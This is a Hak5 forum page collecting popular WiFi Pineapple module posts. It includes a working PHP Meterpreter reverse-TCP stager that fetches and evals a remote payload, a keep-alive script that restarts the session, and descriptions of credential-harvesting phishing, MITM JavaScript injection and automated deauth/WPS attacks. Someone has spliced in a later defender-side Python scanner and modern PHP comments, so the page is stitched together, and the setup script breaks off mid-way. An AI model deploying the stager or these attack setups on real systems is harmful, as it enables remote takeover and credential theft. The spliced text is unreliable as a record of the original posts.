

Most Liked Content


#206691 Network Manager

Posted by Whistle Master on 27 July 2012 - 04:42 PM

Hi everyone !

My new module: a network manager for our pineapple.

This module gives the ability to manage all wifi interfaces (e.g. connect to hotspot), internet sharing, etc.



#204370 Mk4 Meterpreter Module Wip

Posted by Darren Kitchen on 14 June 2012 - 08:14 PM

So I've been working on a meterpreter module and it's 6:00 here so I figured I'd post my work-in-progress.

Here's a screenshot of it in action using armitage / cobalt strike (front-end for metasploit):
Posted Image

And here's a pic of the module WIP:

Posted Image

It's based off the PHP Meterpreter. To test it launch msf console and use the php/meterpreter_reverse_tcp payload.
Or from BT5 R2 start Armitage, hit Yes to start MSF and give it a minute, then from the tree in the top left double-click payload > php > meterpreter_reverse_tcp - set your IP and Port and launch.

Then on the pineapple from a shell issue "php tt.php" ensuring that the first few lines of tt.php reference said IP and port.

Here's the php meterpreter:

<?php

error_reporting(0);
# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '172.16.42.42';
$port = 4445;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {
	# ipv6 requires brackets around the address
	$ip = "[". $ip ."]";
	$ipf = AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
	$s = $f("tcp://{$ip}:{$port}");
	$s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
	$s = $f($ip, $port);
	$s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
	$s = $f($ipf, SOCK_STREAM, SOL_TCP);
	$res = @socket_connect($s, $ip, $port);
	if (!$res) { die(); }
	$s_type = 'socket';
} else {
	die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) { 
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) {
	# We failed on the main socket.  There's no way to continue, so
	# bail
	die();
}
$a = unpack("Nlen", $len);
$len = $a['len'];

$b = '';
while (strlen($b) < $len) {
	switch ($s_type) { 
	case 'stream': $b .= fread($s, $len-strlen($b)); break;
	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
	}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();

?>

Just change IP and Port above to what you're using.

The biggest problem I've had with the module so far is getting it to fork properly. I've tried using "| at now" and even empty (not the greatest since it has a timeout). Even went as far as writing a meterpreter-keepalive.sh which would run by cron every minute. Here's the code:

meterpreter.php

<?php                                                                                                    

if(isset($_GET['start'])) {
	echo "<pre>Starting Meterpreter</pre>";
	exec("/www/pineapple/modules/meterpreter/fork-meterpreter.sh");

//	if (exec("ps aux | grep \"[s]tart-meterpreter.sh\"") == "") {
//		exec("empty -f -i /tmp/meterpreter.in -o /tmp/meterpreter.out -p /tmp/meterpreter.pid -L /tmp/meterpreter.log /www/pineapple/modules/meterpreter/start-meterpreter.sh");
//	} else {
//		echo "<pre><b>Meterpreter already running</b></pre>";
//	}
}

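// The form below only ever submits tt.php, so accept that path and nothing else.
$allowed  = "/www/pineapple/modules/meterpreter/tt.php";
$filename = isset($_POST['filename']) ? $_POST['filename'] : "";
$newdata  = isset($_POST['newdata']) ? $_POST['newdata'] : "";

if ($newdata != "" && $filename === $allowed) {
	// Strip carriage returns (what ereg_replace(13, ...) did; ereg is gone in PHP 7).
	$newdata = str_replace("\r", "", $newdata);
	$fw = fopen($filename, 'w') or die('Could not open file!');
	$fb = fwrite($fw, stripslashes($newdata)) or die('Could not write to file');
	fclose($fw);
	$fileMessage = "Updated " . $filename . "<br /><br />";
} ?>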


<html>
    <head>
    <title>Pineapple Control Center</title>
    <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
    <link rel="stylesheet" type="text/css" href="/pineapple/includes/styles.css" />
    <link rel="icon" href="/pineapple/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href="/pineapple/favicon.ico" type="image/x-icon">
    </head>
<body>
<?php
include_once("/www/pineapple/includes/navbar.php");
?>
<br><br>
<center>
<table width="50%">
<tr><td>
<div class=news>
	<div class=moduleTitle><b>Configuration</b></div>
	<div class=moduleContent>
	Edit IP address and Port below to match that of your metasploit session.
	<?php                                                                                                                                                                                                               
	$filename = "/www/pineapple/modules/meterpreter/tt.php";
	$fh = fopen($filename, "r") or die("Could not open file!");
	$data = fread($fh, filesize($filename)) or die("Could not read file!");                                                                                                                                           
	fclose($fh);                                                                                                                                                                                                      
	echo "<form action='$_SERVER[php_self]' method= 'post' >                                                                                                                                                           
	<textarea name='newdata' rows='20' style='min-width:100%; background-color:black; color:white; border-style:dashed;'>$data</textarea>                                                                               
	<input type='hidden' name='filename' value='/www/pineapple/modules/meterpreter/tt.php'>
	<br><center><input type='submit' value='Update Meterpreter Script'>                                                                                                                                                                
	</form>";                                                                                                                                                                                                           
	?>       
	
	</div>

	<br>
	<div class=moduleTitle>Meterpreter Configuration</div>
	<div class=moduleContent>
	This keep alive script will restart the Meterpreter session if it drops connection.
	
	
	</div>
</td></tr></table></center>
</body>
</html>

meterpreter-keepalive.sh
#!/bin/sh
# -------------------------------------------------
# Simple keep alive script for meterpreter sessions
# -------------------------------------------------
logger "Meterpreter: Keep-Alive Script Executed"
if ! ( pidof php tt.php); then
	php /www/pineapple/modules/meterpreter/tt.php &
	logger "Meterpreter: Connection was down, restarted."
else
	logger "Meterpreter: Connection seems to be up."
fi

My code is rusty having taken a month or so off so I figured I'd post my work in progress. If started from a shell it works great. Just trying to pretty it up / packing it up.

Lemme know what you think. I'm going to go look at the sky or something having nothing to do with computers for a few hours. Sure it'll come to me then...
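
A defender-side check for the pattern in the stager quoted above (outbound socket, read from it, `eval()` of the received bytes), as an added example that is not part of the original post or of Metasploit. It is a heuristic, flow-insensitive scanner; the PHP samples, the 192.0.2.x addresses and all function names are constructed for illustration.

```python
import re

# Strings are matched first so that "tcp://host" is not mistaken for a // comment.
TOKEN = re.compile(r"""'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|/\*.*?\*/|(?:#|//)[^\n]*""", re.S)
# Names of functions that open an outbound connection. Only the name is matched,
# because the stager calls them indirectly through a string ($f = 'fsockopen').
SOCKET_OPEN = re.compile(r'\b(stream_socket_client|fsockopen|socket_connect)\b')
# Calls that return bytes read from a stream or socket resource.
SOCKET_READ = re.compile(r'\b(fread|fgets|stream_get_contents|socket_read)\s*\(')
# "$var = expr;" or "$var .= expr;" (lookahead, so nested statements are all seen).
ASSIGN = re.compile(r'(?=\$(\w+)\s*\.?=(?![=>])\s*([^;]*);)')
EVAL_VAR = re.compile(r'\beval\s*\(\s*\$(\w+)')


def strip_comments(src):
    """Remove PHP comments, keep string literals and line numbering."""
    def keep_or_blank(m):
        tok = m.group(0)
        return tok if tok[0] in "'\"" else "\n" * tok.count("\n")
    return TOKEN.sub(keep_or_blank, src)


def network_tainted_vars(code):
    """Variables assigned from a read call, plus anything derived from them."""
    assigns = [(m.group(1), m.group(2)) for m in ASSIGN.finditer(code)]
    tainted = {lhs for lhs, rhs in assigns if SOCKET_READ.search(rhs)}
    changed = True
    while changed:  # propagate until no new variable is added
        changed = False
        for lhs, rhs in assigns:
            if lhs not in tainted and any(
                    re.search(r'\$' + v + r'\b', rhs) for v in tainted):
                tainted.add(lhs)
                changed = True
    return tainted


def scan_php(source):
    """Report eval() of a variable that holds data read from a stream,
    in a file that also opens an outbound connection."""
    code = strip_comments(source)
    opens = sorted(set(SOCKET_OPEN.findall(code)))
    tainted = network_tainted_vars(code)
    findings = []
    for m in EVAL_VAR.finditer(code):
        if opens and m.group(1) in tainted:
            findings.append({
                "rule": "eval-of-socket-data",
                "var": m.group(1),
                "line": code.count("\n", 0, m.start()) + 1,
                "opens": opens,
            })
    return findings


# Constructed sample with the same shape as the stager in the post.
STAGER_LIKE = r"""<?php
# Constructed sample, not the original file.
$f = 'stream_socket_client';
$s = $f("tcp://192.0.2.10:4445");
$len = fread($s, 4);
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
    $b .= fread($s, $len - strlen($b));
}
eval($b);
"""

# Constructed benign client: reads from a socket but never evaluates the data.
BENIGN_CLIENT = r"""<?php
$s = fsockopen('192.0.2.20', 80);
fwrite($s, "HEAD / HTTP/1.0\r\n\r\n");
$status = fgets($s, 128);
echo htmlspecialchars($status);
// eval($status) would be dangerous, so it is not done here
"""

# Constructed sample: eval() of a local constant next to an unrelated socket.
EVAL_CONSTANT = r"""<?php
$s = fsockopen('192.0.2.20', 80);
$tpl = 'return 1 + 1;';
$n = eval($tpl);
fclose($s);
"""

if __name__ == "__main__":
    for name in ("STAGER_LIKE", "BENIGN_CLIENT", "EVAL_CONSTANT"):
        print(name, scan_php(globals()[name]))
```

Run it over a web root by calling `scan_php()` on each `.php` file's contents; a hit is a lead for manual review, not proof.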


#214943 MITM Module

Posted by Whistle Master on 19 December 2012 - 06:04 PM

Hi guys !

I wanted to share my current module project for the pineapple: a "man-in-the-middle" module :)

Features:
- based on mitmdump and extendable through python scripts
- log history
- helpers to install javascript
- editor to edit scripts

Scripts Sample:
- Simple_Alert.py -> Will trigger an alert to the user.
- BeEF.py -> This would actually replace the BeEF Helper module ^_^
- Upsidedown.py -> Will reverse all web pages, nice for April Fools' Day :rolleyes:
- Snow_storm.py -> Will insert snow on all web pages.





#220055 Automator

Posted by Foxtrot on 10 March 2013 - 07:52 AM

Hey guys!

I present to you Automator! A module that automates attacks such as Deauthing and Karma, Auto-Reaver and Auto-Aircrack, and more on the way! It asks you for a few options on each attack then commences the attack.

Features:
- Automated attacks
- Install packages that are needed
- Add and Edit profiles for attacks
- Blackout Attacks - Disable all LEDs, enable stealth mode and select an attack!

Coming soon:
- Edit back-end scripts to suit your needs
- Add community attacks/automations to the module
- Auto-detect wifi cards

Sneak peek:

0000-00-01.png




#212453 [Warning !] If You're Using The V2.7.0 Fw : Go To 172.16.42.1:1471...

Posted by barry99705 on 28 October 2012 - 09:48 AM

What makes you think they'll read this post if they don't read the first pinned post at the top of this page?


#216938 Texting Pineapple

Posted by newbi3 on 22 January 2013 - 07:18 PM

This is just some proof of concept code I have been working on and finally got to a good point. My thought behind this project is to give you a way to control your pineapple that doesn't look like you are a "hacker" or whatever. It just looks like you are texting your brother or girlfriend or whatever telling them to turn on the oven, or open the front door for you or something like that. When the pineapple receives a message that says something like "hey man open the front door for me, thanks" it turns on karma and sends a message back that says "Hey, the front door is open and don't worry about it".

I will be releasing this code soon on here, I just need to make it nice and pretty first and get some ideas from you guys first.

Here is a video of it in action:

(I completely forgot to show that karma turned on but just take my word for it that it did!)

Can a moderator please move this to the project section? Sorry, and thanks in advance!




#215622 7+ years and counting

Posted by digip on 31 December 2012 - 11:13 PM

Saw the challenge coin in the hak5 shop, and realized, 7 plus years and counting. Wow. There aren't a lot of things on the internet that last that long, let alone podcasts or internet TV shows, including hacker groups and movements in general. Hak5 is one of those things, you either love us or hate us, but I say us, because for as long as I've watched the show, it's always been about the community around the show as part of the show and not just about the people in front of the camera. From past cast and crew members, to feuds I'll never understand completely, nor need to, to the sub culture that was the old Hak5 IRC and original forums, to today's current show and forums, we're still here.

Back in about 2004/2005 I was watching a lot of weird stuff, some good, some bad, some foreign TV just because I could and it was different. I remember watching Sean Kennedy and a few others on Rant Media, some playlist of stuff I found on some site somewhere, using of all things, WinAMP on Windows 98 (yes, I didn't move to XP until around 2006 or so). One night there was a rotation of techy shows and just internet TV in general. Most of it was just people with cameras goofing off, pre YouTube era, so seeing real people from around the world video tape themselves and put it online to watch, was kind of home movie style, no real direction but still entertaining. People wanted to talk and get their message out, and lots of others found they had the same interests, or common topics of interest such as technology and computers. Then I caught an episode of Hak5, and began to try and figure out what it was I was watching, since I hadn't found it through their site, but from some playlist with a rotation of stuff like SKTFMTV. This was a bit different, and less anarchist and underground. This was just a group of young geeks, but they seemed to have things down a bit and looked like the kind of friends I hung with, drinking beer and messing about with computers and stupid shit. Their show was structured and flowed naturally, and everyone seemed to just speak like the average Joe and make sense of what they were doing with their projects, explaining them in detail, almost instructional, but not too hard to follow along with, and I was learning something new each month on top of staying interested. I was instantly hooked on the show, and for a while, so was my wife.

Working at a bank at the time, doing data processing, running VSE and MVS on an IBM Mainframe, I already had an interest in computers, technology, and wanting to know how everything worked. I was also building websites on the side just by teaching myself by viewing the source of websites and figuring out, what happens if I change this here or move this here, etc. I was also in a band at the time, and ready to quit my job and move to Oregon to play music full time, something that I was very close to doing had it not been for computers. Because I knew how to create websites, I was obviously in charge of doing our band's website and also in charge of recording our music, which was everything from just about us, to a music and band review site of other bands, where people would mail me CD's and I would review and post their music online for others to listen to, to going back to just being about our band. I had my own music studio and started recording other bands' albums, mixing, mastering and producing stuff, while my band mate moved to Oregon, I stayed behind working on computers and recording my own music at home. We were still trying to figure out how to make a living at being musicians ourselves and monetize our work at the same time... Needless to say, I decided a steady pay check working at the bank made more sense than moving to Oregon to sleep on someone's floor while trying to find work in a state and town I knew nothing about. My bandmate was not making any kind of real money, and he was still playing open mic nights, pretty much what we were doing here, so I said screw it, I'm not leaving good money and benefits for being homeless and nothing to live on.

I met my wife, and my work at the bank was the more solid and important move, which led to many promotions and new responsibilities, and in some part, Hak5 and my interest in computers kind of kept me grounded to that. I wanted to get more into networking and building computers, fixing and learning about them and Hak5 helped keep that interest for much of my inspiration with computers. I became somewhat the geek of our department, where most of the people I worked with were older than me, often 30 or more years older than me and half computer illiterate, but they had been doing Mainframe Data Processing for most their life, and like trained monkeys, only knew what they were taught. I learned my job in 2 weeks, something that wasn't supposed to happen that way, but because I had a knack for computers, I more or less picked it up right away, and the guy who trained me then jumped ship and left me to fend for myself. I spent the next year working with my boss over the phone most nights, having him actually teach me how to do most of what my trainer had not. It was sink or swim, which is kind of true in today's IT world. If tasked to do something, they expect you to figure it out, whether you've been shown or trained how to do it or not. Hak5 and the forums kind of helped fill that void because there were and are still plenty of things people come in here asking about that I have no clue about, and it keeps me on my toes. One learns real fast how to find info online and I developed my own ways of finding information long before I'd ever even heard the term "google dork", using sites as old as WebCrawler, Lycos, Excite and Yahoo, and even MSN search, I don't even remember what year it was when I made Google my default home page on my browsers...

When the show first started, DIVX and XVID were all the rage for making home movies online. RealPlayer and windows media player were becoming old hat, and broadband was becoming more accessible, so downloading 300, 400, and 600mb tv shows was becoming commonplace. My wife and I used to download all the early Hak5 episodes and I would burn them on dvd so we could watch them together on our living room DVD player, which at the time was one of the first stand alone DVD players to be able to play DIVX and XVID avi files. It was there, that we spent hours watching all the early season one and two stuff and became fans. By sometime around 2006 I joined the forums and I've been here ever since. A lot has changed over the years, but a lot is still truly the same if you look at everything the cast has done and gone through, to what the community is today.

I don't come in as often as I used to, and I've seen plenty of rotation of cast members over the years, but the show is larger than the sum of its parts, past and present. Its existence is still here because of everyone, not just the crew, but also because of the community, on and offline. We get picked on a lot and I've heard some harsh words here and there over the years from other groups and communities that like to make it out as a rivalry thing, people who've put us down, hacked into the site and forums, dumped our passwords and so on, but as far as I am concerned, we have some of the smartest and brightest people, right here in the Hak5 community. We may not go around defacing websites, or teaching people how to steal credit cards, or run LOIC's to DDoS websites, but I think people here are smart enough to know how to handle themselves, and know that hacking isn't about how many boxes you can pop, but it's more about the people, the knowledge and the relationships made with others in the community and that shared interest in technology and inventiveness in general.

I've met some of you in person, talk with many of you online, and also worked with some of you on a number of projects. I've even started a second business with one of the members of our community, all because I trust and respected his abilities. I have the highest respect for all those who have come and gone and contributed to the community over the years, both cast and crew members, to moderators and the original IRC people who lurked in the shadows. By and large, you are all why Hak5 is still here, 7 years later, keeping us entertained each week, but also what keeps our interest. I love coming to the forums to see questions I have no answers for, because it means I still have a lot to learn, things to research and figure out on my own, and for as many that have tried to come in and take things down, troll us, or just plain insult us, I have met some of the nicest, humblest, and smartest people in the hacker community because of Hak5. I would have never met half the people I worked for and work for today, such as the folks at Offensive Security and Social-Engineer.org, or people like Dave Kennedy and Iron Geek who put on Derbycon. It's because of Hak5 and others like them that I keep coming back.

For what it's worth, I hope Hak5 and the rest of us are still here another 7 years from now. Have a safe and Happy New Year, to all the cast, crew and community, past present and future! Cheers and trust your technolust!


#213169 Offline Credential Harvesting HoneyPot -- Module (Phishing Module)

Posted by mondrianaire on 12 November 2012 - 01:52 PM

I am almost finished with v0.1 of my offline phishing module. The premise of this module is simple. You set the ssid of an open wireless network (Free Public Wifi, etc.). When enabled, all requests will be forwarded to a 'walled garden' splash page. This will inform the viewer that they have limited access to only certain pages, and will give links to these pages. Every one of these pages is a phishing page that you can upload to the module (even your own!).

Since all phishing pages are hosted locally, this module is intended to work all of the time, without internet access. It gives the user the impression that they are connecting to pages on the internet, yet all credentials are harvested.

Another beautiful thing about this module is how little hardware it uses. I have been known to have up to 3 usb wifi cards plugged into my pineapple while using for deauth/wifi repeating etc... This module can be used with only a properly formatted flash drive, eliminating a need for a usb hub (and the extra power it consumes).

I need Seb or someone at wifipineapple.com to verify me for module submission.

I also would like to talk to Petertfm about this module. I have reused (embarrassingly large amounts of) his code from his RandomRoll module in this. Our modules are extremely similar in both frontend and backend. I would like to ask him a couple of questions/ get him to sign off on the parts of his code I used before making this public. I have tried to message him but he does not accept messages. Petertfm if you read this, please send me a message or an email at my uname [at] gmail.



#210144 [Module] Reaver V0.4

Posted by Hackrylix on 18 September 2012 - 06:36 AM

Hey hackers !

I'm working on the reaver module. I think I'm near a beta release.

EDIT :   v0.4 Released

Features :
  • System check (install reaver if not already installed)
  • Choose where to install reaver (internal or USB)
  • Select the interface to scan (based on networkmanager module)
  • Select AP to attack (based on networkmanager module)
  • Launch/Stop the attack
  • Auto-Refresh output
  • 3 switches (-c, -a, -S)
  • enable/disable interface
  • reworked layout
  • Wiki page added in the pineapple wiki
  • NEW : Fix bug : check if reaver is installed
  • NEW : Propose install on usb only in case of detection of a mounted drive
Future Features :
  • Reaver options (all or most useful available arguments)
  • Verbosity level
  • Trigger alert on key found
  • Start at boot
  • [postponed][new] use of wash to scan ap (wps checker) -> I'm still having issue with this command, postponed until 100% working.
  • [new] manage logs (internal/usb, move and copy, log cleaning (empty or delete)
  • You choose ...
Github (contribute coding, wiki (to merge with pineapple-wiki), ...) : https://github.com/Hackrylix/reaver

Official Wiki : http://cloud.wifipin...u.php?id=reaver

Credits to Whistle Master for the use of parts of his code.

What kind of feature do you want ? How do you want me to show the module page ? Any suggestion is welcome !

Cheers


v0.4 screen shots :
Posted Image


#206182 Test sticky

Posted by Darren Kitchen on 18 July 2012 - 08:15 PM

After weeks of researching, writing, rewriting and more fun than I care to mention with page layout software, I present to you the first WiFi Pineapple book.

Booklet really. It's just 50 pages. This booklet outlines basic usage of the WiFi Pineapple including: Connectivity, Power Considerations, Windows and Linux setup, Inside the Web Interface, SSH Management, Meterpreter, Expansion Modules and more.

Download the PDF:
https://www.dropbox.com/s/dr6sedfteu8atwq/hak5-mk4-book1e.pdf

Or buy one on the HakShop for $5:
http://hakshop.mysho...neapple-booklet


#205446 Bartender Module

Posted by Sebkinne on 02 July 2012 - 06:12 PM

Hey everyone,

A feature which we wanted to build into the pineapple for some time is an easy way to create modules.
Currently creating modules is complicated and simply a hassle and may scare off people with great ideas.
This is why the Bartender was born!

Rather than making it part of the current firmware the Bartender feature will be released as a module to enable faster updates if the module system changes.

One thing though, updating the module will cause a loss of all your created projects, so make sure to back these up.
This will be addressed in the next module update.

Just remember, this is just a basic module creator, in the future it will:
  • Allow code upload.
  • Direct module submission from your pineapple.
  • Projects persistent through a Bartender update.
  • Quite a lot more.

To use the Bartender, simply download the module and follow the instructions there.


Please leave any feedback, comments or suggestions here.

Best Regards,
Sebkinne


#201567 Mark 4 Setup Script

Posted by petertfm on 28 April 2012 - 04:46 PM

I made a script that I run after a reflash and it has come in handy when I mess the pineapple up and have to reinstall firmware, was getting tired of inputting this manually.

pineapple-mk4-setup-script.sh
Version 3.2

#!/bin/sh

# Version 3.2
# This is a script for the pineapple mark 4 firmware 2.7.1 up, Newer firmware may break this script, Read through to add or comment out what you don't want.
# Run: chmod +x pineapple-mk4-setup-script.sh; ./pineapple-mk4-setup-script.sh
# It is assumed a USB drive with swap partition is unplugged and waiting to be inserted: http://forums.hak5.org/index.php?showtopic=25882&hl=swap&st=0



red='\e[0;31m'
lightRed='\e[1;31m'
green='\e[0;32m'
yellow='\e[0;33m'
cyan='\e[0;36m'
textReset='\e[m'
bold='\033[1m'
boldEnd='\033[0m'
uWhite='\e[4;37m'


appleSuccess=true
changeTimeZone=true
autoStartKarma=true
DNSSpoofLogsToUSB=true
changeSSID=true
changePineapplePort=true
stealthAutoStart=true

updateFSTabForSwap=true
useUSB=true # Please use one;-)

cleanUpUSB=true
logsToUSB=false


isThereInternet=true # Required for installing packages!!!

# All get installed to /usb/
installSSLStrip=true # Requires Internet
installTCPDump=true # Requires Internet
installNMap=true # Requires Internet
installReaver=true #Requires Internet
installMDK3=true #Requires Internet


changeRootPassword=true
newrootpassword='pineapplesareyummy'

newSSID='AndroidAP'
newPineapplePort=1471 # make sure it's above 1024

newTimeZone='PST8PDT'                    # PST8PDT America/Vancouver visit http://wiki.openwrt.org/doc/uci/system#time.zones for a list of time zones
newTimeZoneLocation='America/Vancouver'    # Please be careful, do not put in the whole value IE "PST8PDT,M3.2.0,M11.1.0" just use the PST8PDT
                                        # If you mess this up you may need to use serial connection to fix!!!

echo
echo -e $uWhite$bold'Pineapple Mark 4 setup script created by'$cyan' petertfm'$textReset
echo
echo


# Enable Apple Success to disable portal page popup when dnsspoofing with no internet:
if [ $appleSuccess = true ]; then
    if [ -d /www/ ]; then
        # mkdir -p also creates /www/library/test when /www/library already exists
        mkdir -p /www/library/test
        if [ ! -f /www/library/test/success.html ]; then
            echo -e '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
        <TITLE>Success</TITLE>
</HEAD>
<BODY>
Success
</BODY>
</HTML>' > /www/library/test/success.html
        fi
        echo -e '/www/library/test/success.html Created: Tricks apple products to believe there is internet when running dnsspoof.'
    else
        echo -e $lightRed'/www/ folder not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# Change Timezone:
if [ $changeTimeZone = true ]; then
    if [ -f /etc/config/system ]; then
        echo -e 'Changing TimeZone: '$yellow$newTimeZone$textReset'   Location: '$yellow$newTimeZoneLocation
        sed -i "s/option timezone.*/option timezone '"$newTimeZone"'/g" /etc/config/system
        if [ -f /etc/rc.d/S98sysntpd ]; then
            /etc/rc.d/S98sysntpd restart
        else
            echo -e $lightRed'/etc/rc.d/S98sysntpd file not found, most likely script needs to be updated, firmware may have changed'
        fi
    else
        echo -e $lightRed'/etc/config/system file not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# AutoStart Karma
if [ $autoStartKarma = true ]; then
    if [ -f /pineapple/karma/autoKarmaStart.php ]; then
        php /pineapple/karma/autoKarmaStart.php > /dev/null
        echo 'Karma AutoStart Enabled'
    else
        echo -e $lightRed'/pineapple/karma/autoKarmaStart.php file not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# DNSSpoof Logs to USB:
if [ $DNSSpoofLogsToUSB = true ]; then
    if [ -f /pineapple/dnsspoof/dnsspoof.sh ]; then
        echo -e '#!/bin/sh

if [ ! -d /usb/logs ]; then
    mkdir /usb/logs
fi
if [ ! -d /usb/logs/DNSSpoof ]; then
    mkdir /usb/logs/DNSSpoof
fi

if [ -b /dev/sda1 ]; then
    MYPATH="/usb/logs/DNSSpoof/DNSSpoof-"
    dnsspoofFile="null"
    x=1
    while :
    do
        dnsspoofFile=${MYPATH}${x}.log
        if [ ! -f $dnsspoofFile ]; then
                break
        fi
        x=$(( $x + 1 ))
    done

    if [ -f /usb/logs/DNSSpoof/DNSSpoof.log ]; then
        md5=`md5sum /usb/logs/DNSSpoof/DNSSpoof.log`
        if [ ${md5:0:32} != "9a13ce17b26d5d2e2e153584c2d7c8e8" ]; then
            cp /usb/logs/DNSSpoof/DNSSpoof.log ${dnsspoofFile}
        fi
    fi

    sed -i "s/$cmd = \\"cat logs\\/dnsspoof.log\\";.*/$cmd = \\"cat \\/usb\\/logs\\/DNSSpoof\\/DNSSpoof.log\\";/g" /pineapple/pages/logs.php
    dnsspoof -i br-lan -f /pineapple/config/spoofhost > /dev/null 2> /usb/logs/DNSSpoof/DNSSpoof.log
else
    sed -i "s/$cmd = \\"cat \\/usb\\/logs\\/DNSSpoof\\/DNSSpoof.log\\";.*/$cmd = \\"cat logs\\/dnsspoof.log\\";/g" /pineapple/pages/logs.php
    dnsspoof -i br-lan -f /pineapple/config/spoofhost > /dev/null 2> /pineapple/logs/dnsspoof.log
fi' > /pineapple/dnsspoof/dnsspoof.sh
        echo 'Installed DNSSpoof logs to usb by petertfm'
    else
        echo -e $lightRed'/pineapple/dnsspoof/dnsspoof.sh file not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# Changing SSID:
if [ $changeSSID = true ]; then
    echo -e 'Changing SSID: '$yellow$newSSID
    # Quote the value so an SSID containing spaces survives both the shell and UCI
    sed -i "s/option ssid.*/option ssid '$newSSID'/g" /etc/config/wireless
    echo -e $textReset
fi


# Changing Pineapple UI Port:
if [ $changePineapplePort = true ]; then
    echo -e 'Changing Pineapple UI Port: '$yellow$newPineapplePort
    currentPort=`cat /etc/config/uhttpd | grep -i listen_http | grep -v listen_https | tail -n 1`
    currentPortPos=`expr index "$currentPort" :`
    port=${currentPort:$currentPortPos}
    sed -i 's/'$port'/'$newPineapplePort'/g' /etc/config/uhttpd
    echo -e $textReset
fi


# Enable Stealth:
if [ $stealthAutoStart = true ]; then
    if [ -f /etc/rc.local ]; then
        sed -i '/icmp_echo_ignore_all/d' /etc/rc.local
        sed -i '/exit 0/d' /etc/rc.local
        echo -e 'echo -e 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all # Autostart Stealth mode
exit 0' >> /etc/rc.local
        echo 'Stealth AutoStart Enabled'
    else
        echo -e $lightRed'/etc/rc.local file not found, most likely script needs to be updated, firmware may have changed'
    fi
    echo -e $textReset
fi


# Updating FStab(USB):
if [ $updateFSTabForSwap = true ]; then
    if [ -f /etc/config/fstab ]; then
        echo 'Updating fstab for use with swap partition'
        echo -e 'config global automount
       option from_fstab 1
       option anon_mount 1

config global autoswap
       option from_fstab 1
       option anon_swap 1

config mount
       option target   /usb
       option device   /dev/sda1
       option fstype   ext4
       option options  rw,sync
       option enabled  1
       option enabled_fsck 0

config swap
       option device   /dev/sda2
       option enabled  1' > /etc/config/fstab
    else
        echo -e $lightRed'/etc/config/fstab file not found, most likely script needs to be updated, firmware may have changed'
        echo -e $red'This script is outdated, Exiting...'
        exit 1
    fi
    echo -e $textReset
fi






#
##
###
####
##### The rest of this script is mostly USB related with an exception to changing the root password
if [ $useUSB = true ]; then

    echo
    read -p 'Please Insert USB Drive then press ENTER!!!' nullVar
    echo 'Sleeping 15 seconds, USB drive initializing.'
    sleep 15
    echo -e $textReset

    if [ -b /dev/sda1 ]; then # The dev name of what gets mounted to /usb/

        # Make swap:
        if [ $updateFSTabForSwap = true ]; then
            if [ -b /dev/sda2 ]; then
                echo 'mkswap /dev/sda2, Swap may already have been made previously'
                mkswap /dev/sda2
            else
                echo -e $lightRed'/dev/sda2 not found for swap!'
            fi
            echo -e $textReset
        fi


        # Starting fresh with pineapple created files/folders on USB, From a previous install/firmware.
        if [ $cleanUpUSB = true ]; then
            echo 'Removing folders on USB, In prep for fresh settings'
            echo -e $yellow'(NOTE) Keep /usb/etc/ and /usb/usr/ to save previously installed OPKG packages'$textReset
            if [ -d /usb/data/ ]; then
                echo -n -e "Remove /usb/data/ "$cyan"(y)/n? "$textReset
                read dataYesNo
                if [[ "$dataYesNo" == '' ]]; then
                    dataYesNo='y'
                fi
                if [ $dataYesNo == 'y' ]; then
                    echo 'Removing: /usb/data/ TCPDump module is known to use this folder'
                    rm -r /usb/data/
                fi
            fi
            if [ -d /usb/get/ ]; then
                echo -n -e "Remove /usb/get/ "$cyan"(y)/n? "$textReset
                read getYesNo
                if [[ "$getYesNo" == '' ]]; then
                    getYesNo='y'
                fi
                if [ $getYesNo == 'y' ]; then
                    echo 'Removing: /usb/get/ get module is known to use this folder'
                    rm -r /usb/get/
                fi
            fi
            if [ -d /usb/logs/ ]; then
                echo -n -e "Remove /usb/logs/ "$cyan"(y)/n? "$textReset
                read logsYesNo
                if [[ "$logsYesNo" == '' ]]; then
                    logsYesNo='y'
                fi
                if [ $logsYesNo == 'y' ]; then
                    echo 'Removing: /usb/logs/'
                    rm -r /usb/logs/
                fi
            fi
            if [ -d /usb/modules/ ]; then
                echo -n -e "Remove /usb/modules/ "$cyan"(y)/n? "$textReset
                read modulesYesNo
                if [[ "$modulesYesNo" == '' ]]; then
                    modulesYesNo='y'
                fi
                if [ $modulesYesNo == 'y' ]; then
                    echo 'Removing: /usb/modules/'
                    rm -r /usb/modules/
                fi
            fi
            if [ -d /usb/infusions/ ]; then
                echo -n -e "Remove /usb/infusions/ "$cyan"(y)/n? "$textReset
                read infusionsYesNo
                if [[ "$infusionsYesNo" == '' ]]; then
                    infusionsYesNo='y'
                fi
                if [ $infusionsYesNo == 'y' ]; then
                    echo 'Removing: /usb/infusions/'
                    rm -r /usb/infusions/
                fi
            fi
            if [ -d /usb/etc/ ]; then
                echo -n -e "Remove /usb/etc/ "$cyan"(y)/n? "$textReset
                read etcYesNo
                if [[ "$etcYesNo" == '' ]]; then
                    etcYesNo='y'
                fi
                if [ $etcYesNo == 'y' ]; then
                    echo 'Removing: /usb/etc/'
                    rm -r /usb/etc/
                fi
            fi
            if [ -d /usb/usr/ ]; then
                echo -n -e "Remove /usb/usr/ "$cyan"(y)/n? "$textReset
                read usrYesNo
